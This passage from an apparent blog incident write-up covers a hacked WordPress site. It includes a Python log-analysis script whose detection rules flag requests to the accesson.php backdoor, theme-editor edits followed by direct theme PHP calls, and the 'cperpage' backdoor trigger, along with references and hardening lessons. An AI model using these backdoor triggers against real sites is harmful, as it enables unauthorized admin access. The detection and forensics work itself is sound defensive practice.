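UA:Mozilla/5.0 (constructed benign visitor)

77.111.175.75(Zalaegerszeg,HU) [17/May/2018:21:17:15 +0000] - https 200 3825Bytes
GET /assets/images/accesson.php HTTP/1.1
REF:-
UA:Mozilla/5.0 (X11; Linux x86_64) Ubuntu Chromium/60.0.3112.78
"""


def parse_log(text: str) -> list:
    """Parse blank-line-separated four-line records; malformed records are skipped."""
    records = []
    for block in re.split(r'\n\s*\n', text.strip()):
        lines = block.strip().split("\n")
        if len(lines) < 2:
            continue
        head = _HEAD_RE.match(lines[0])
        req = _REQ_RE.match(lines[1])
        if not head or not req:
            continue
        ip, geo, ts, scheme, status, size = head.groups()
        method, target = req.groups()
        path, _, query = target.partition("?")
        records.append({
            "ip": ip, "geo": geo,
            "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "scheme": scheme, "status": int(status), "bytes": int(size),
            "method": method, "path": path, "query": query,
            "ref": lines[2][4:] if len(lines) > 2 and lines[2].startswith("REF:") else "",
            "ua": lines[3][3:] if len(lines) > 3 and lines[3].startswith("UA:") else "",
        })
    return records


def ips_hitting(records, needle: str) -> list:
    """The pivot from the post: every client IP that requested a path containing needle."""
    return sorted({r["ip"] for r in records if needle in r["path"]})


def requests_by(records, ips) -> list:
    """All requests from the given IPs, in time order (the second grep in the post)."""
    ips = set(ips)
    return sorted((r for r in records if r["ip"] in ips), key=lambda r: r["time"])


def theme_edit_then_direct_php(records, window_seconds: int = 120) -> list:
    """Flag a POST to wp-admin/theme-editor.php followed, from the same IP within the
    window, by a direct request to a .php file under wp-content/themes/. Theme files are
    not requested directly in normal use, so this matches the edit-then-call sequence."""
    hits = []
    edits = [r for r in records
             if r["method"] == "POST" and r["path"].endswith("/wp-admin/theme-editor.php")]
    for e in edits:
        deadline = e["time"] + timedelta(seconds=window_seconds)
        for r in records:
            if (r["ip"] == e["ip"] and e["time"] < r["time"] <= deadline
                    and r["path"].startswith("/wp-content/themes/")
                    and r["path"].endswith(".php")):
                hits.append((r["ip"], r["path"], r["status"]))
    return hits


def query_param_probes(records, param: str) -> list:
    """Requests carrying a given query parameter, e.g. the cperpage trigger seen above."""
    return [(r["ip"], r["path"], r["query"]) for r in records
            if re.search(r'(?:^|&)' + re.escape(param) + r'=', r["query"])]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print(ips_hitting(recs, "accesson.php"))
    print(theme_edit_then_direct_php(recs))
    print(query_param_probes(recs, "cperpage"))
```

Both rules are cheap enough to run over every rotated log after decompression; the theme-editor rule in particular would have fired on 15 May, two days before the second IP came back for the file.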

Database

I then searched the database for these two IPs and the User-Agents they used, and found a token used to remember a login. To be safe I deleted those fields, although this forces every user with a remembered login to sign in again.


References:

About accesson.php:

Drupalgeddon2 (SA-CORE-2018-002 / CVE-2018-7600) – an analysis of payloads observed in the wild. Notably, the vulnerability exploited in that article is Drupal's CVE-2018-7600; in addition, the accesson.php on my site has the same MD5 as the sample of the same filename mentioned there.

Additional Finds in Compromised Site · Issue #12 · scr34m/php-malware-scanner. Reports that WordPress sites using a certain plugin are frequently found with the accesson.php backdoor planted.

About cperpage=1:

This is a trojan embedded in the theme. The attacker used this backdoor to get into my site's admin backend, tamper with files and plant their own trojan.

Wordpress functions.php 主题文件后门分析 (an analysis of a backdoor in WordPress functions.php theme files). It mentions that this backdoor can be used for unauthorized access to the backend and that it is infectious: when a backdoored theme is activated, it automatically adds the backdoor to the other installed themes.


Summary:

1. Lesson: when you find signs of a compromise, preserve the evidence. This time, because I overwrote the theme by updating it, I could no longer examine the accesson.php in the theme directory or the tampered 404.php.
2. The cperpage=1 backdoor hidden in the theme has a long history (it was reported back in 2010) and may have been on my site for a long time without being noticed, until an attacker exploited it this time.
3. The attack does not appear to have had any substantive impact on my site, including but not limited to page defacement, sending spam, attacking other hosts, or cryptocurrency mining.
4. Do not download themes from random theme sites, especially "cracked" versions of paid themes: the investigation in one of the reference articles suggests this backdoor was probably added when a shady theme site repackaged the theme.
5. (Update: 2018.6.1) One option is to run find $wordpress_path -type f -exec chmod 444 {} + to change the permissions of every file under the WordPress directory from 644 to 444, so that no user other than root can write to them. This does, however, break automatic updates of plugins, themes and WordPress core.